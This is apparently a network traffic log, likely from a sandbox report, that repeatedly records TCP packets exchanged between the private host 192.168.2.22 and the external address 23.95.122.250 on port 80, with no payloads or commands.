Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
